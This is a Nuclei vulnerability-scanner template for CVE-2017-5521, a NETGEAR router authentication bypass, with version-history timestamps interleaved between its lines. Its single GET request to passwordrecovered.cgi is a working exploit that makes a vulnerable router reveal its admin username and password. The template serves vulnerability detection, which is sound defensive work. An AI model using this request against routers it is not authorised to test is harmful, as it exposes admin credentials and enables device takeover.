2021-04-13 19:54:49 +00:00
id : CVE-2017-5521
2022-04-22 10:38:41 +00:00
2021-04-13 19:54:49 +00:00
info :
2022-06-19 15:19:56 +00:00
name : NETGEAR Routers - Authentication Bypass
2021-04-13 19:54:49 +00:00
author : princechaddha
2021-09-10 11:26:40 +00:00
severity : high
2022-06-20 16:07:02 +00:00
description : |
NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
2021-08-18 11:37:49 +00:00
reference :
2021-04-13 19:54:49 +00:00
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
2022-05-17 09:18:12 +00:00
- http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/
2022-06-19 15:19:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-5521
2023-07-11 19:49:27 +00:00
- http://www.securityfocus.com/bid/95457
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-5521
cwe-id : CWE-200
2023-07-11 19:49:27 +00:00
epss-score : 0.97402
cpe : cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : netgear
product : r6200_firmware
tags : cve,cve2017,auth-bypass,netgear,router,kev
2021-04-13 19:54:49 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-04-13 19:54:49 +00:00
- method : GET
path :
- "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"
matchers-condition : and
matchers :
- type : word
2022-06-20 16:07:02 +00:00
part : body
2021-04-13 19:54:49 +00:00
words :
- "right\">Router\\s*Admin\\s*Username<"
- "right\">Router\\s*Admin\\s*Password<"
condition : and
2022-06-20 16:07:02 +00:00
2021-04-13 19:54:49 +00:00
- type : status
status :
- 200